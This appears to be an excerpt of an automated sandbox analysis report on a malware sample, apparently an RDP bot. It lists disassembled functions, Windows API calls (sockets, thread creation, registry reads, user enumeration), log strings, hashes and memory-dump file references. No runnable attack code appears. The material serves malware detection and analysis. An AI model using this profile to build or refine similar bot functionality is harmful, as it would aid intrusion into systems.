WSAGetLastError.WS2_32 ref: 00007FFE0E1626FC
WSAGetLastError.WS2_32 ref: 00007FFE0E16273E

Part of subcall function 00007FFE0E162209: ioctlsocket.WS2_32 ref: 00007FFE0E16222F

Part of subcall function 00007FFE0E162154: setsockopt.WS2_32 ref: 00007FFE0E16217C
Part of subcall function 00007FFE0E162154: setsockopt.WS2_32 ref: 00007FFE0E1621A8

WSAGetLastError.WS2_32 ref: 00007FFE0E16276B

Strings

tcp_connect, xrefs: 00007FFE0E1625ED, 00007FFE0E162708, 00007FFE0E162726, 00007FFE0E162753, 00007FFE0E16277C, 00007FFE0E1627A6
[W] (%s) -> select timedout(sock=0x%llx,timeo=%u), xrefs: 00007FFE0E16272D
[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u), xrefs: 00007FFE0E1627AD
[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE0E162783
[E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE0E16275A
[E] (%s) -> connection failed(host=%08x,port=%u), xrefs: 00007FFE0E1625F4
[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE0E16270F

Memory Dump Source

Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd

Similarity

API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
API String ID: 3154682637-708158336
Opcode ID: 38dbff91742fcd545e8c6506307d99f0f3ef583879267fb3d588f94e721ee5a1
Instruction ID: 1aa727a16737b71545cb7ab8ea98d08a4113c5f9cb354e424e22e7b6f591b79d
Opcode Fuzzy Hash: 38dbff91742fcd545e8c6506307d99f0f3ef583879267fb3d588f94e721ee5a1
Instruction Fuzzy Hash: B251C271A0C65742F6605B25E8002B97761AF85B64F14033BE9FE46AF6EE7CE545C700

Function 00007FFE11509FE1 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE11509FFC
CreateThread.KERNEL32 ref: 00007FFE1150A03C
GetLastError.KERNEL32 ref: 00007FFE1150A084
GetLastError.KERNEL32 ref: 00007FFE1150A15C

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

, xrefs: 00007FFE1150A0A2
[I] (%s) -> %s, xrefs: 00007FFE1150A263
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu), xrefs: 00007FFE1150A096
[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu), xrefs: 00007FFE1150A16E
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE1150A070
ebus_init, xrefs: 00007FFE1150A069, 00007FFE1150A08F, 00007FFE1150A167, 00007FFE1150A25C
Done, xrefs: 00007FFE1150A255
P, xrefs: 00007FFE1150A10B
P, xrefs: 00007FFE1150A1A7
, xrefs: 00007FFE1150A17A
~, xrefs: 00007FFE1150A102
~, xrefs: 00007FFE1150A1A2

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
API String ID: 1412730629-3633878399
Opcode ID: bfa06299d377331daaefa4f7970977a13a5e79947c507c36398a4aca178b456a
Instruction ID: 7c2b2521d932f71d76610fb3a4bff88c25c0af3ada0aea55529cedf79b3ee8f7
Opcode Fuzzy Hash: bfa06299d377331daaefa4f7970977a13a5e79947c507c36398a4aca178b456a
Instruction Fuzzy Hash: 26511F20A0CF47C2FB71979AA8D437D225A9F05374F5403BAC53E462F2EF6EA8858301

Function 00007FFE0EB4F401 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE0EB4F41C
CreateThread.KERNEL32 ref: 00007FFE0EB4F45C
GetLastError.KERNEL32 ref: 00007FFE0EB4F4A4
GetLastError.KERNEL32 ref: 00007FFE0EB4F57C

Part of subcall function 00007FFE0EB41292: fwrite.MSVCRT ref: 00007FFE0EB4133E
Part of subcall function 00007FFE0EB41292: fflush.MSVCRT ref: 00007FFE0EB4134A

Strings

~, xrefs: 00007FFE0EB4F5C2
P, xrefs: 00007FFE0EB4F52B
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0EB4F490
, xrefs: 00007FFE0EB4F4C2
[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu), xrefs: 00007FFE0EB4F58E
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu), xrefs: 00007FFE0EB4F4B6
P, xrefs: 00007FFE0EB4F5C7
ebus_init, xrefs: 00007FFE0EB4F489, 00007FFE0EB4F4AF, 00007FFE0EB4F587, 00007FFE0EB4F67C
~, xrefs: 00007FFE0EB4F522
[I] (%s) -> %s, xrefs: 00007FFE0EB4F683
, xrefs: 00007FFE0EB4F59A
Done, xrefs: 00007FFE0EB4F675

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
API String ID: 1412730629-3633878399
Opcode ID: 3d1ab3aa8f4161a05aa8dfdd1c0cce3f996ef00871ce4195b1a1b84c650aac4e
Instruction ID: b13b76025f1c92d6c42aac831637d9bcd072b238c26446a8178e8eeab5ea1d2a
Opcode Fuzzy Hash: 3d1ab3aa8f4161a05aa8dfdd1c0cce3f996ef00871ce4195b1a1b84c650aac4e
Instruction Fuzzy Hash: 5B5124A1B0C70782FB309F54A8843792290EF14375F242336CAEE472F5DE6DA8859E52

Function 00007FFE0EBD1D21 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE0EBD1D3C
CreateThread.KERNEL32 ref: 00007FFE0EBD1D7C
GetLastError.KERNEL32 ref: 00007FFE0EBD1DC4
GetLastError.KERNEL32 ref: 00007FFE0EBD1E9C

Part of subcall function 00007FFE0EBD1292: fwrite.MSVCRT ref: 00007FFE0EBD133E
Part of subcall function 00007FFE0EBD1292: fflush.MSVCRT ref: 00007FFE0EBD134A

Strings

, xrefs: 00007FFE0EBD1DE2
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu), xrefs: 00007FFE0EBD1DD6
, xrefs: 00007FFE0EBD1EBA
P, xrefs: 00007FFE0EBD1E4B
~, xrefs: 00007FFE0EBD1EE2
Done, xrefs: 00007FFE0EBD1F95
P, xrefs: 00007FFE0EBD1EE7
[I] (%s) -> %s, xrefs: 00007FFE0EBD1FA3
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0EBD1DB0
[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu), xrefs: 00007FFE0EBD1EAE
ebus_init, xrefs: 00007FFE0EBD1DA9, 00007FFE0EBD1DCF, 00007FFE0EBD1EA7, 00007FFE0EBD1F9C
~, xrefs: 00007FFE0EBD1E42

Memory Dump Source

Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true

Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd

Similarity

API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
API String ID: 1412730629-3633878399
Opcode ID: 49160c02cce2c89ffc56554c0373e9f5e5be1747f4788ff1eb59c31af80c948e
Instruction ID: 2665dd818eee34b28fbf7a27c11049ea72c0e34533a30b0e8de22bd7fce702ee
Opcode Fuzzy Hash: 49160c02cce2c89ffc56554c0373e9f5e5be1747f4788ff1eb59c31af80c948e
Instruction Fuzzy Hash: A651E760A0E74382FB305F1CA4843F82696AF05365F640736C5EE463F5EF6DA9859F41

Function 00007FFE0EC03B21 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE0EC03B3C
CreateThread.KERNEL32 ref: 00007FFE0EC03B7C
GetLastError.KERNEL32 ref: 00007FFE0EC03BC4
GetLastError.KERNEL32 ref: 00007FFE0EC03C9C

Part of subcall function 00007FFE0EC02FD2: fwrite.MSVCRT ref: 00007FFE0EC0307E
Part of subcall function 00007FFE0EC02FD2: fflush.MSVCRT ref: 00007FFE0EC0308A

Strings

~, xrefs: 00007FFE0EC03CE2
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu), xrefs: 00007FFE0EC03BD6
, xrefs: 00007FFE0EC03CBA
, xrefs: 00007FFE0EC03BE2
P, xrefs: 00007FFE0EC03CE7
Done, xrefs: 00007FFE0EC03D95
ebus_init, xrefs: 00007FFE0EC03BA9, 00007FFE0EC03BCF, 00007FFE0EC03CA7, 00007FFE0EC03D9C
P, xrefs: 00007FFE0EC03C4B
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0EC03BB0
[I] (%s) -> %s, xrefs: 00007FFE0EC03DA3
~, xrefs: 00007FFE0EC03C42
[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu), xrefs: 00007FFE0EC03CAE

Memory Dump Source

Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true

Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd

Similarity

API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
API String ID: 1412730629-3633878399
Opcode ID: 9f20d362d937536f0ee4103508d9b1139d0d6585478f89b21611969e913930d6
Instruction ID: 6db533256c650b6ff275134fcbbea626e4eb6488a5014beca231945cc607e344
Opcode Fuzzy Hash: 9f20d362d937536f0ee4103508d9b1139d0d6585478f89b21611969e913930d6
Instruction Fuzzy Hash: 9651E860A1C7C3A2FB60579CA8C83B823519F06379F640736C5EE462F1DE6FA9859243

Function 00007FFE0E161D21 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE0E161D3C
CreateThread.KERNEL32 ref: 00007FFE0E161D7C
GetLastError.KERNEL32 ref: 00007FFE0E161DC4
GetLastError.KERNEL32 ref: 00007FFE0E161E9C

Part of subcall function 00007FFE0E161292: fwrite.MSVCRT ref: 00007FFE0E16133E
Part of subcall function 00007FFE0E161292: fflush.MSVCRT ref: 00007FFE0E16134A

Strings

~, xrefs: 00007FFE0E161E42
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu), xrefs: 00007FFE0E161DD6
Done, xrefs: 00007FFE0E161F95
P, xrefs: 00007FFE0E161E4B
, xrefs: 00007FFE0E161DE2
[I] (%s) -> %s, xrefs: 00007FFE0E161FA3
ebus_init, xrefs: 00007FFE0E161DA9, 00007FFE0E161DCF, 00007FFE0E161EA7, 00007FFE0E161F9C
[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu), xrefs: 00007FFE0E161EAE
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0E161DB0
, xrefs: 00007FFE0E161EBA
~, xrefs: 00007FFE0E161EE2
P, xrefs: 00007FFE0E161EE7

Memory Dump Source

Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd

Similarity

API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
API String ID: 1412730629-3633878399
Opcode ID: 281e6b280061e0635a5243834af1028dd6d232271e6f00ea43ae733916f1591a
Instruction ID: a6be6d44f69f868ddb7340421f4c4fd992c299d07847dbc7cb40b45825094bf5
Opcode Fuzzy Hash: 281e6b280061e0635a5243834af1028dd6d232271e6f00ea43ae733916f1591a
Instruction Fuzzy Hash: 49512860F0E743A2FB305B14A4843B82663AF05765F240B37D5FE462F2DF6DA9899342

Function 00007FF6BFD66242 Relevance: 27.2, APIs: 7, Strings: 11, Instructions: 241memorystringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6BFD784F0,00000000,00000000), ref: 00007FF6BFD6628D
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6BFD784F0,00000000,00000000), ref: 00007FF6BFD6629E

Part of subcall function 00007FF6BFD62515: fopen.MSVCRT ref: 00007FF6BFD6255A
Part of subcall function 00007FF6BFD62515: fseek.MSVCRT ref: 00007FF6BFD62579
Part of subcall function 00007FF6BFD62515: _errno.MSVCRT ref: 00007FF6BFD6258D
Part of subcall function 00007FF6BFD62515: _errno.MSVCRT ref: 00007FF6BFD625A8

GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6BFD784F0,00000000,00000000), ref: 00007FF6BFD663CA
HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6BFD784F0,00000000,00000000), ref: 00007FF6BFD663DB
strncpy.MSVCRT ref: 00007FF6BFD6651C
strncpy.MSVCRT ref: 00007FF6BFD66533
strncpy.MSVCRT ref: 00007FF6BFD66592

Part of subcall function 00007FF6BFD699E2: fwrite.MSVCRT ref: 00007FF6BFD69A8E
Part of subcall function 00007FF6BFD699E2: fflush.MSVCRT ref: 00007FF6BFD69A9A

Strings

mem_alloc, xrefs: 00007FF6BFD66423
ini_load, xrefs: 00007FF6BFD662CF, 00007FF6BFD6630B, 00007FF6BFD665F1
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF6BFD66312
5, xrefs: 00007FF6BFD662F5
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF6BFD6642A
(path != NULL), xrefs: 00007FF6BFD66304
[I] (%s) -> Done(path=%s), xrefs: 00007FF6BFD665F8
service, xrefs: 00007FF6BFD6624D
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF6BFD662FD
NULL, xrefs: 00007FF6BFD665E2
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6BFD662D6

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
String ID: (path != NULL)$5$H:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc$service
API String ID: 1423203057-595982613
Opcode ID: 80942592db8f3c253b1855c65e91fcdc3096fbaa6f48945d97735cc1c0d4eca0
Instruction ID: f5a4930906b0e6814fca34a61631c6eeca7ee3ec49effd166276a48dfc1ef1d9
Opcode Fuzzy Hash: 80942592db8f3c253b1855c65e91fcdc3096fbaa6f48945d97735cc1c0d4eca0
Instruction Fuzzy Hash: CFA1C262A0D682A1EB119B99E8003B97B61BF42784F484236FF4DCF7A5DE3DE545C380

Function 00007FF6BFD65602 Relevance: 26.5, APIs: 3, Strings: 12, Instructions: 246registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32 ref: 00007FF6BFD6565C
RegQueryValueExA.KERNEL32 ref: 00007FF6BFD657A4

Part of subcall function 00007FF6BFD699E2: fwrite.MSVCRT ref: 00007FF6BFD69A8E
Part of subcall function 00007FF6BFD699E2: fflush.MSVCRT ref: 00007FF6BFD69A9A

Strings

registry_get_value, xrefs: 00007FF6BFD65677, 00007FF6BFD656D0, 00007FF6BFD65703, 00007FF6BFD65736, 00007FF6BFD65769, 00007FF6BFD657CB, 00007FF6BFD65916, 00007FF6BFD65A94
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FF6BFD6567E
(root != NULL), xrefs: 00007FF6BFD656C9
NULL, xrefs: 00007FF6BFD657FE, 00007FF6BFD65AAC, 00007FF6BFD65AB8
[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FF6BFD657D2
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF6BFD6591D
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF6BFD656D7, 00007FF6BFD6570A, 00007FF6BFD6573D, 00007FF6BFD65770
(value != NULL), xrefs: 00007FF6BFD6572F
(key != NULL), xrefs: 00007FF6BFD656FC
H:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FF6BFD656C2, 00007FF6BFD656F5, 00007FF6BFD65728, 00007FF6BFD6575B
[D] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FF6BFD65A9B
(value_sz != NULL), xrefs: 00007FF6BFD65762

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: OpenQueryValuefflushfwrite
String ID: (key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
API String ID: 1980715187-2022313065
Opcode ID: 352408240713be7a7cb69aa9724280b692f81e1d013cd9d5b02acbcca2736477
Instruction ID: 1a8643c4c395d42c07aab53cae11a2985ec10d5bd63d6fae1d9234fbfa18754a
Opcode Fuzzy Hash: 352408240713be7a7cb69aa9724280b692f81e1d013cd9d5b02acbcca2736477
Instruction Fuzzy Hash: AAA10161D0C74BA1F6309BC8A8403797350AF00748E541337EB5ECAAB1EE6DA9C9D7C2

Function 00007FFE133063CB Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 134memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FFE133064B6
HeapAlloc.KERNEL32 ref: 00007FFE133064CA
CreateThread.KERNEL32 ref: 00007FFE1330650C
EnterCriticalSection.KERNEL32 ref: 00007FFE13306526
LeaveCriticalSection.KERNEL32 ref: 00007FFE1330654D

Strings

[I] (%s) -> Server ready(ssock=0x%llx), xrefs: 00007FFE133063FD
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE1330657C
[I] (%s) -> Client accepted(client=0x%llx), xrefs: 00007FFE1330655E
[E] (%s) -> CreateThread(routine_rx) failed(client=0x%llx,gle=%lu), xrefs: 00007FFE133065B4
routine_accept, xrefs: 00007FFE133063F6, 00007FFE13306557, 00007FFE133065AD
mem_alloc, xrefs: 00007FFE13306575

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: CriticalHeapSection$AllocCreateEnterLeaveProcessThread
String ID: [E] (%s) -> CreateThread(routine_rx) failed(client=0x%llx,gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Client accepted(client=0x%llx)$[I] (%s) -> Server ready(ssock=0x%llx)$mem_alloc$routine_accept
API String ID: 3282357527-375624272
Opcode ID: 7a0a3bce79b1013c93c0ed9f4f6e98f2c711db9e4a5f9ad0e19da206398e9982
Instruction ID: 5599f6cafe15189994e89abfb2e68b5d7bbbde894e2f81d1b8abbebd12b1208f
Opcode Fuzzy Hash: 7a0a3bce79b1013c93c0ed9f4f6e98f2c711db9e4a5f9ad0e19da206398e9982
Instruction Fuzzy Hash: 75516560A08E0389FA149B17A85037D2291EF657B4F2403B5D93D677FADF3CE4459309

Function 00007FFE0E163C65 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 00007FFE0E1638F8
wcsncpy.MSVCRT ref: 00007FFE0E163926
LookupAccountNameW.ADVAPI32 ref: 00007FFE0E163983
GetLastError.KERNEL32 ref: 00007FFE0E163995
wcslen.MSVCRT ref: 00007FFE0E163D0B
GetProcessHeap.KERNEL32 ref: 00007FFE0E163D1B
HeapAlloc.KERNEL32 ref: 00007FFE0E163D2C
GetProcessHeap.KERNEL32 ref: 00007FFE0E163D48
HeapAlloc.KERNEL32 ref: 00007FFE0E163D59
NetApiBufferFree.NETAPI32 ref: 00007FFE0E163D97
NetUserEnum.NETAPI32 ref: 00007FFE0E163E0D
GetProcessHeap.KERNEL32 ref: 00007FFE0E163E4B
HeapAlloc.KERNEL32 ref: 00007FFE0E163E5C
memcpy.MSVCRT ref: 00007FFE0E163E99
GetProcessHeap.KERNEL32 ref: 00007FFE0E163E9E
HeapFree.KERNEL32 ref: 00007FFE0E163EAF

Strings

D, xrefs: 00007FFE0E163915
mem_alloc, xrefs: 00007FFE0E163D6F
users_sync, xrefs: 00007FFE0E1639A0
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE0E163D76
[E] (%s) -> LookupAccountNameW failed(gle=%lu), xrefs: 00007FFE0E1639A7

Memory Dump Source

Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
